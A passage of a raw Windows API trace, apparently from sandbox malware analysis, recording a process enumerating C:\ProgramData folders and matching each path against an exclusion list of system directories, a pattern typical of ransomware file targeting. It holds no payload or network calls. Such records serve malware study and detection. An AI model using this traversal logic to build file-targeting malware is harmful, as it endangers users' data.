psz1="C:\\ProgramData\\", psz2="Comms", cchMax=1054 | out: psz1="C:\\ProgramData\\Comms") returned="C:\\ProgramData\\Comms" [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\local\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\boot\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\perflogs\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Comms" [0072.034] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0072.034] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0072.034] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0072.034] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0072.034] StrCmpW (psz1="Documents", psz2=".") returned 1 [0072.034] StrCmpW (psz1="Documents", psz2="..") returned 1 [0072.034] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.034] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.034] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.034] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ecd6462, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3ecd6462, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3ecd6462, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0072.034] StrCmpW (psz1="Microsoft OneDrive", psz2=".") returned 1 [0072.034] StrCmpW (psz1="Microsoft OneDrive", psz2="..") returned 1 [0072.034] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.034] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.034] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Microsoft OneDrive", cchMax=1054 | out: psz1="C:\\ProgramData\\Microsoft OneDrive") returned="C:\\ProgramData\\Microsoft OneDrive" [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\boot\\") returned 0x0 [0072.034] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Microsoft OneDrive" [0072.035] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa2d56a03, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa2d56a03, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa2d56a03, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0072.035] StrCmpW (psz1="Oracle", psz2=".") returned 1 [0072.035] StrCmpW (psz1="Oracle", psz2="..") returned 1 [0072.035] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.035] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.035] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Oracle", cchMax=1054 | out: psz1="C:\\ProgramData\\Oracle") returned="C:\\ProgramData\\Oracle" [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system32\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\local\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\boot\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\perflogs\\") returned 0x0 [0072.035] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Oracle" [0072.035] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcf03b3d5, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xdefc9a0c, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xdefc9a0c, ftLastWriteTime.dwHighDateTime=0x1d327b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0072.035] StrCmpW (psz1="Package Cache", psz2=".") returned 1 [0072.035] StrCmpW (psz1="Package Cache", psz2="..") returned 1 [0072.035] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.036] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.036] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Package Cache", cchMax=1054 | out: psz1="C:\\ProgramData\\Package Cache") returned="C:\\ProgramData\\Package Cache" [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system32\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\local\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.036] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\boot\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\perflogs\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Package Cache" [0072.037] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17d079d0, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3122174, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x53fba98c, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0072.037] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2=".") returned 1 [0072.037] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2="..") returned 1 [0072.037] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.037] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.037] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="regid.1991-06.com.microsoft", cchMax=1054 | out: psz1="C:\\ProgramData\\regid.1991-06.com.microsoft") returned="C:\\ProgramData\\regid.1991-06.com.microsoft" [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\local\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\boot\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\perflogs\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\programdata\\") returned=":\\ProgramData\\regid.1991-06.com.microsoft" [0072.037] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc31230fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0072.037] StrCmpW (psz1="SoftwareDistribution", psz2=".") returned 1 [0072.037] StrCmpW (psz1="SoftwareDistribution", psz2="..") returned 1 [0072.037] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.037] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.037] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="SoftwareDistribution", cchMax=1054 | out: psz1="C:\\ProgramData\\SoftwareDistribution") returned="C:\\ProgramData\\SoftwareDistribution" [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system32\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system\\") returned 0x0 [0072.037] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\local\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\boot\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\perflogs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\programdata\\") returned=":\\ProgramData\\SoftwareDistribution" [0072.038] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0072.038] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0072.038] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0072.038] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0072.038] StrCmpW (psz1="Templates", psz2=".") returned 1 [0072.038] StrCmpW (psz1="Templates", psz2="..") returned 1 [0072.038] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1931975, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1931975, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0072.038] StrCmpW (psz1="USOPrivate", psz2=".") returned 1 [0072.038] StrCmpW (psz1="USOPrivate", psz2="..") returned 1 [0072.038] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.038] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.038] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOPrivate", cchMax=1054 | out: psz1="C:\\ProgramData\\USOPrivate") returned="C:\\ProgramData\\USOPrivate" [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system32\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\local\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\boot\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\perflogs\\") returned 0x0 [0072.038] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOPrivate" [0072.038] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ade3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa4ade3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ade3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0072.039] StrCmpW (psz1="USOShared", psz2=".") returned 1 [0072.039] StrCmpW (psz1="USOShared", psz2="..") returned 1 [0072.039] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.039] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.039] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOShared", cchMax=1054 | out: psz1="C:\\ProgramData\\USOShared") returned="C:\\ProgramData\\USOShared" [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system32\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\local\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\boot\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\perflogs\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOShared" [0072.039] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 1 [0072.039] StrCmpW (psz1="WindowsHolographicDevices", psz2=".") returned 1 [0072.039] StrCmpW (psz1="WindowsHolographicDevices", psz2="..") returned 1 [0072.039] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.039] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.039] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="WindowsHolographicDevices", cchMax=1054 | out: psz1="C:\\ProgramData\\WindowsHolographicDevices") returned="C:\\ProgramData\\WindowsHolographicDevices" [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system32\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\local\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.039] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\boot\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\perflogs\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\programdata\\") returned=":\\ProgramData\\WindowsHolographicDevices" [0072.040] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 0 [0072.040] FindClose (in: hFindFile=0xec26b0 | out: hFindFile=0xec26b0) returned 1 [0072.040] GetProcessHeap () returned 0xe30000 [0072.040] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0072.040] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0072.040] StrCmpW (psz1="Recovery", psz2=".") returned 1 [0072.040] StrCmpW (psz1="Recovery", 